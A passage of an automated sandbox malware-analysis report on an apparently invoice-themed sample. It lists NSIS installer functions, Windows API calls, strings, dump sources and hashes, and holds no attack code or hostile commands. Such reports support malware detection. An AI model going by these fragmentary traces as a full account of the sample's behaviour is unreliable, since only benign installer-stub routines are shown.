                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FE3
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                  • String ID: 6B
                                                                                                                                  • API String ID: 184305955-4127139157
                                                                                                                                  • Opcode ID: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
                                                                                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                                                  • Opcode Fuzzy Hash: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
                                                                                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                                                                                  Function 00403974 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,75573420,00435000,00000000), ref: 004039F5
                                                                                                                                  • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A75
                                                                                                                                  • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                                  • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A93
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403ADC
                                                                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                                  • API String ID: 1975747703-949986762
                                                                                                                                  • Opcode ID: 89a04da5b1a7f732205bfcbbcbb949e4048d33089e5c9c5f3b92beb7b6129cbb
                                                                                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                                                                                  • Opcode Fuzzy Hash: 89a04da5b1a7f732205bfcbbcbb949e4048d33089e5c9c5f3b92beb7b6129cbb
                                                                                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D
                                                                                                                                  Function 004043BA Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                  • String ID: 1C@$N
                                                                                                                                  • API String ID: 3103080414-3285487881
                                                                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                                  Function 004046EC Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                                                  • lstrcmpiW.KERNEL32(004281A0,004236E8,00000000,?,?), ref: 00404853
                                                                                                                                  • lstrcatW.KERNEL32(?,004281A0), ref: 0040485F
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$6B
                                                                                                                                  • API String ID: 2624150263-3505403099
                                                                                                                                  • Opcode ID: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
                                                                                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                                                  • Opcode Fuzzy Hash: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
                                                                                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                                                  Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                  • Opcode ID: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                                  • Opcode Fuzzy Hash: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                                  Function 00402EDD Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                  Strings
                                                                                                                                  • soft, xrefs: 00402FCB
                                                                                                                                  • Error launching installer, xrefs: 00402F2D
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                  • Inst, xrefs: 00402FC2
                                                                                                                                  • Null, xrefs: 00402FD4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                                                                                  Function 004062A6 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(004281A0,00000400), ref: 004063E7
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004063FA
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,?,00000000,004226C8,?,00405323,004226C8,00000000), ref: 00406436
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 00406444
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 0040644F
                                                                                                                                  • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                                                  • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004064CD
                                                                                                                                  Strings
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7
                                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 717251189-730719616
                                                                                                                                  • Opcode ID: 1e760ec33e8736f6c82404e72030ce22e22765ed589060b9a69778a605fdc3c8
                                                                                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                                                                                  • Opcode Fuzzy Hash: 1e760ec33e8736f6c82404e72030ce22e22765ed589060b9a69778a605fdc3c8
                                                                                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                                                                                                  Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                                                  Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
